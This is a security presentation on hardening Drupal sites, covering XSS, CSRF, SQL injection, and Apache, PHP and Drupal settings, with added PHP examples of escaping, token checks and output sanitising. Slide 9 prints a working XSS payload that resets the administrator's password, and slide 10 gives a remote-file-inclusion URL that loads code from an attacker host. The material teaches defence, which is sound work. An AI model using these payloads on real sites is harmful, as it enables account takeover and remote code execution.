Drupal Security Hardening

Drupal Security Hardening

All about web application security, the common threats, and how to counter these threats.

The content of this presentation was derived from the work of several notable Drupal Security Team members, including Greg Knaddison, Khalid Baheyeldin, Heine Deelstra, and Dave Reid.

Special thanks to Greg's book "Cracking Drupal: A Drop in the Bucket".

Published in: Technology

  1. Agenda
     ● Anatomy of Vulnerabilities
     ● Protecting against Vulnerabilities
  2. Kite Systems is an Agile development house, which means the client is actively involved all the way through the development process. We build high quality, secure platforms using Java J2EE, Microsoft .NET, Ruby on Rails, PHP and Python.
  3. Join Us
  4. About myself, Gerald Villorente
     ● Web Developer/themer at Kite Systems Inc.
     ● Drupal developer since 2010
     ● Drupal PH kids mentor
  5. Is Drupal Secure?
  6. State of being “SECURE”
     “A site is secure if:
     ● private data is kept private,
     ● the site cannot be forced offline or into a degraded mode by a remote visitor,
     ● the site resources are used only for their intended purposes,
     ● the site content can be edited only by appropriate users.”
  7. Weak spots of web applications
     For a Drupal developer who wants to deliver an application, security does not end with proper use of the Drupal security API:
     ● OS (MS, Unix, BSD, OS X)
     ● Web Server (Apache, IIS, Nginx, ...)
     ● Web Platform (PHP, .NET, ...)
     ● Other Services (FTP, …)
     ● Web applications - attacks against authentication & authorization, site structure, input validation, app logic
     ● Database - SQL injection
     ● Availability - DoS attacks
  8. Common Drupal attacks
     ● XSS
     ● CSRF
     ● Injection
  9. XSS
     // Script injected through an XSS hole; it runs in the browser of a logged-in
     // administrator and uses that user's session to change user 1's password.
     jQuery.get(Drupal.settings.basePath + 'user/1/edit',
       function (data, status) {
         if (status == 'success') {
           // Extract the token and other required data
           var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]+)"/);
           var token = matches[1];
           // Post the minimum amount of fields. Other fields get their default values.
           var payload = {
             "form_id": 'user_profile_form',
             "form_token": token,
             "pass[pass1]": 'hacked',
             "pass[pass2]": 'hacked'
           };
           jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload);
         }
       }
     );
  10. Other Attacks
      ● DDoS
      ● Remote code execution - exploiting register_globals in PHP:
          require ($page . ".php");
          http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
  11. Demo
  12. Counter Measures
      ● Proper use of Drupal API
      ● Coding Standard (coder, code_sniffer) - Coder & Sniffer demo
      ● Keep up with security patches and minor releases
      ● Permission by role (hook_perm, user_access)
      ● Firewall
      ● SSL (Secure Sockets Layer)
  13. Counter Measures (cont.)
      ● File permission
  14. Apache Hardening
      ● Disable unneeded modules
      ● Implement ModSecurity: Request Filtering, Anti-Evasion Techniques, HTTP Filtering Rules, Full Audit Logging, HTTPS Intercepting, Chroot Functionality, Mask Web Server Identity
      ● Document root restriction – allow Apache to only go to /path/to/public_html
  15. Apache Hardening
      ● Chrooting Apache
          $ mkdir -p /var/chroot/apache
          $ adduser --home /var/chroot/apache --shell /bin/false --no-create-home --system --group juandelacruz
  16. PHP Hardening (part 1)
      ● turn off register_globals
      ● open_basedir - restrict PHP file access to only certain directories
      ● disable_functions
      ● expose_php - remove PHP info from HTTP headers
      ● display_errors
      ● safe_mode - PHP can use only files which it owns
      ● allow_url_fopen
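The settings on this slide are easy to audit from PHP itself. The script below is an added example, not part of the presentation: it reads the running configuration with ini_get() and reports every deviation from the slide's list. The expected values, the list of process-spawning functions it looks for in disable_functions, and the treatment of directives removed in PHP 5.4 (register_globals, safe_mode) are this example's own choices. Run it under the same SAPI the site uses, because the CLI and the web server may load different php.ini files.

```php
<?php
// Added example, not from the slides: audit the running PHP configuration
// against the hardening list on slide 16. The expectations below are this
// example's own, derived from the slide.

// ini_get() returns "0", "", "Off", "1" or "On" depending on how php.ini spells
// the value; normalise to a boolean. A directive unknown to this PHP build
// (e.g. register_globals or safe_mode, both removed in PHP 5.4) gives null.
function ini_flag($name) {
  $value = ini_get($name);
  if ($value === false) {
    return null;
  }
  return filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

// Returns a list of findings; an empty list means every check passed.
function audit_php_hardening() {
  $findings = array();

  // Directives the slide says to turn off.
  foreach (array('register_globals', 'expose_php', 'display_errors', 'allow_url_fopen') as $name) {
    if (ini_flag($name) === true) {
      $findings[] = "$name is On; set \"$name = Off\" in php.ini";
    }
  }

  // open_basedir: empty means PHP may read any file the web server user can.
  if (trim((string) ini_get('open_basedir')) === '') {
    $findings[] = 'open_basedir is unset; restrict PHP to the document root and its temp directory';
  }

  // disable_functions: the process-spawning functions are the minimum to list.
  $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
  foreach (array('exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'popen') as $fn) {
    if (!in_array($fn, $disabled, true)) {
      $findings[] = "$fn is callable; add it to disable_functions";
    }
  }

  // safe_mode only exists on PHP < 5.4; report it only if the directive is present and off.
  if (ini_flag('safe_mode') === false) {
    $findings[] = 'safe_mode is Off (PHP < 5.4); the slide recommends On';
  }

  return $findings;
}

$findings = audit_php_hardening();
if (empty($findings)) {
  echo "All PHP hardening checks passed\n";
} else {
  foreach ($findings as $finding) {
    echo "- $finding\n";
  }
}
```

On a modern PHP the register_globals and safe_mode checks are silently skipped because the directives no longer exist; the remaining checks (expose_php, display_errors, allow_url_fopen, open_basedir, disable_functions) still apply.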
  17. PHP Hardening (part 2)
      ● Suhosin - PHP engine protection through a couple of patches; provides a range of runtime protection, session protection, filtering features and logging
  18. Drupal Hardening
      ● Keep updated
      ● Coding standard
      ● Install only trusted modules; check the issue queue
      ● Use captcha, login_security, single_login, password_policy, salt
      ● User permissions
      ● Input formats and filters
  19. Drupal Hardening: Coding Standard
      ● Never write and/or execute SQL commands manually; use the Drupal DB layer.
      ● Use db_query() properly. Don't write this:
          db_query("SELECT * FROM {users} WHERE name = '$username'");
        Write this:
          db_query("SELECT * FROM {users} WHERE name = '%s'", $username);
        Placeholders are: %s, %d, %f, %b, %%
      ● Use db_rewrite_sql() to respect node access restrictions:
          $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
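To make the difference between the two db_query() forms visible, here is an added example (not from the slides and not Drupal's own code) that models how Drupal 6's db_query() expands its placeholders: %s is passed through db_escape_string(), %d is cast to an integer, and so on. It builds only the SQL text, so no database is needed; the {table} prefixing step of the real function is left out, and the hostile username is a constructed value.

```php
<?php
// Added example, not from the slides: a stand-alone model of Drupal 6's
// db_query() placeholder expansion, showing why the '%s' form on slide 19
// keeps hostile input inside one string literal while interpolation does not.

// Model of db_escape_string(), which in Drupal 6 wraps mysql_real_escape_string():
// backslash-escape the quote, backslash and control characters MySQL treats specially.
function model_db_escape_string($text) {
  return addcslashes((string) $text, "\x00\n\r\\'\"\x1a");
}

// Model of _db_query_callback(): %d casts to int, %f to float, %s escapes the
// string, %b passes binary through unchanged, %% is a literal percent sign.
function model_db_query($query, array $args) {
  $i = 0;
  return preg_replace_callback('/(%d|%s|%%|%f|%b)/', function ($match) use ($args, &$i) {
    switch ($match[1]) {
      case '%d': return (string) (int) $args[$i++];
      case '%f': return (string) (float) $args[$i++];
      case '%s': return model_db_escape_string($args[$i++]);
      case '%b': return $args[$i++];
      default:   return '%';
    }
  }, $query);
}

// What the slide says not to do: the value becomes part of the SQL text, so a
// quote inside it closes the literal and the remainder is parsed as SQL.
function unsafe_user_query($username) {
  return "SELECT * FROM {users} WHERE name = '$username'";
}

// What the slide recommends: a quoted %s placeholder with the value passed
// separately, so every quote in the value is escaped and it stays one literal.
function safe_user_query($username) {
  return model_db_query("SELECT * FROM {users} WHERE name = '%s'", array($username));
}

// Constructed hostile input for the demonstration.
$username = "x' OR '1'='1";
echo unsafe_user_query($username), "\n";
echo safe_user_query($username), "\n";

// %d shows the other half of the rule: non-numeric input collapses to 0.
echo model_db_query("SELECT * FROM {users} WHERE uid = %d", array("1 OR 1=1")), "\n";
```

Note that the protection depends on the placeholder being quoted in the query string: `name = %s` without the surrounding single quotes would still produce a broken query even though the value is escaped, which is why the slide writes it as `'%s'`.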
  20. Drupal Hardening: Form API
      ● Never write forms manually; use Drupal's Forms API
      ● The Forms API protects you from invalid form data
      ● The Forms API protects you against CSRF
      ● Don't trust JS for input validation; it is easy to disable. If you want to use it, always check user data on the server side as well.
      ● When using AJAX, use drupal_get_token and drupal_check_token: calculate a hash of a defined string, the user session and a site-specific secret code
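The last bullet describes a token scheme in one sentence; the added example below (not from the slides, and not Drupal's own code) shows it end to end so the reason it stops CSRF is visible: the token is bound to the user's session and to the action string, so a token minted for another session or another action does not verify. In Drupal 6 core the functions are drupal_get_token() and drupal_valid_token(), which hash session id, value and the site's private key with md5; this model keeps the same three ingredients but uses a keyed HMAC-SHA256 instead. The secret, session id and request data are constructed values.

```php
<?php
// Added example, not from the slides: a stand-alone model of the AJAX token
// scheme on slide 20 (hash of a defined string, the user session and a
// site-specific secret). Runs with `php file.php`; no Drupal bootstrap needed.

// Token = HMAC(secret, session id + action string). Drupal 6 itself uses
// md5(session_id . value . private_key); the HMAC is a swapped-in, stronger
// construction for the same purpose.
function model_get_token($value, $session_id, $private_key) {
  return hash_hmac('sha256', $session_id . '|' . $value, $private_key);
}

// Constant-time comparison so the check does not leak how many characters matched.
function model_valid_token($token, $value, $session_id, $private_key) {
  return hash_equals(model_get_token($value, $session_id, $private_key), (string) $token);
}

// The AJAX callback: refuse the request unless the token matches this session
// and this action, then act on the (cast) node id.
function handle_delete_ajax(array $request, $session_id, $private_key) {
  if (!isset($request['token'])
      || !model_valid_token($request['token'], 'example/delete', $session_id, $private_key)) {
    return array('status' => 403, 'body' => 'Invalid token');
  }
  return array('status' => 200, 'body' => 'Deleted item ' . (int) $request['nid']);
}

// Constructed site secret and session for the demonstration.
$private_key = 'constructed-site-secret-0123456789abcdef';
$session_id  = 'constructed-session-id';

// The page that renders the AJAX link issues the token for this session and action
// (in Drupal it would be handed to the client through Drupal.settings).
$token = model_get_token('example/delete', $session_id, $private_key);

// 1. Legitimate request from the same session: accepted.
print_r(handle_delete_ajax(array('token' => $token, 'nid' => 7), $session_id, $private_key));

// 2. Cross-site request: a token minted for another session does not verify.
$foreign = model_get_token('example/delete', 'attacker-controlled-session', $private_key);
print_r(handle_delete_ajax(array('token' => $foreign, 'nid' => 7), $session_id, $private_key));

// 3. Same session, but a token issued for a different action: also rejected.
$other = model_get_token('example/publish', $session_id, $private_key);
print_r(handle_delete_ajax(array('token' => $other, 'nid' => 7), $session_id, $private_key));

// 4. Missing token altogether: rejected.
print_r(handle_delete_ajax(array('nid' => 7), $session_id, $private_key));
```

The action string is what makes the token specific: one token per kind of operation means a leaked token for a harmless callback cannot be replayed against a destructive one.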
  21. Drupal Hardening: File Upload
      ● file_validate_is_image - check if the file is really an image
      ● check_file - check if the file was uploaded via HTTP POST
      ● file_check_location - check if a file is really located inside $directory
      ● Set disk quotas properly; you don't want to fill the server's hard disk
  22. Drupal Hardening: Respect and define new permissions
      ● Consider using hook_perm in your module
      ● Wrap your code with user_access:
          if (user_access('some permission')) { .... }
      ● filter_access($format) – check if the user has access to the requested filter format
      ● Use menu access arguments
  23. Drupal Hardening: Don't trust user input
      Filter user input, sanitize the output
      ● Input Format
      ● filter_xss() - Filters HTML to prevent XSS
      ● check_plain() - Encodes special characters in a plain-text string for display as HTML
      ● check_url() - Filters dangerous protocols
      ● check_markup() - Runs all the enabled filters on a piece of text
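The following is an added example, not part of the presentation and not Drupal's code, that models two of the sanitizers on this slide so their effect on rendered HTML can be seen without a Drupal bootstrap. Drupal 6's check_plain() is htmlspecialchars() with ENT_QUOTES and UTF-8, which the model reproduces exactly; check_url() wraps filter_xss_bad_protocol(), and the protocol filter here follows that function's approach (decode entities, then repeatedly strip any scheme not on the allowed list, ignoring non-alphanumerics inside the scheme) but is a simplified version with its own allowed list. The profile values are constructed inputs.

```php
<?php
// Added example, not from the slides: models of check_plain() and check_url()
// applied to constructed user input, rendering the same profile fragment
// unsanitised and sanitised. Runs with `php file.php`.

// Model of Drupal 6 check_plain(): encode &, <, >, " and ' for safe output as HTML text.
function model_check_plain($text) {
  return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// Simplified model of check_url() / filter_xss_bad_protocol(): decode entities
// first (so "&#106;avascript:" cannot hide the scheme), then keep removing the
// leading scheme while it is not on the allowed list. Non-alphanumerics are
// dropped before the lookup, so "java\tscript:" is treated as "javascript:".
function model_check_url($url, array $allowed = array('http', 'https', 'ftp', 'mailto')) {
  $url = html_entity_decode((string) $url, ENT_QUOTES, 'UTF-8');
  do {
    $before = $url;
    $colon = strpos($url, ':');
    if ($colon > 0) {
      $scheme = substr($url, 0, $colon);
      if (preg_match('![/?#]!', $scheme)) {
        break;  // the colon sits inside a path or query, not a scheme
      }
      $scheme = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $scheme));
      if (!in_array($scheme, $allowed, true)) {
        $url = substr($url, $colon + 1);
      }
    }
  } while ($before !== $url);
  return model_check_plain($url);
}

// Unsafe rendering: user-controlled values are dropped straight into the markup.
function render_profile_unsafe($name, $homepage) {
  return '<a href="' . $homepage . '">' . $name . '</a>';
}

// Safe rendering: attribute value through check_url, text through check_plain.
function render_profile_safe($name, $homepage) {
  return '<a href="' . model_check_url($homepage) . '">' . model_check_plain($name) . '</a>';
}

// Constructed inputs a visitor might submit as display name and homepage.
$name     = '<script>alert(1)</script> "Bob"';
$homepage = 'java script:alert(document.cookie)';

echo render_profile_unsafe($name, $homepage), "\n";
echo render_profile_safe($name, $homepage), "\n";

// A legitimate URL passes through check_url unchanged apart from HTML encoding.
echo model_check_url('http://example.com/?a=1&b=2'), "\n";
```

The split matters: check_plain() alone would not have protected the href, because a `javascript:` URL contains no characters that HTML encoding touches; only the protocol filter removes it.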
  24. Drupal Hardening: Don't trust user input
  25. Again, think like a hacker...
      ● Use penetration testing tools:
          - Metasploit framework
          - Nessus
          - Nikto
          - Backbox and Backtrack
      ● Fix, audit, fix ...
  26. Resources
      ● http://drupal.org/security
      ● http://drupal.org/writing-secure-code
      ● http://crackingdrupal.com
      ● http://www.owasp.org
      ● http://ha.ckers.org
      ● http://www.exploit-db.com
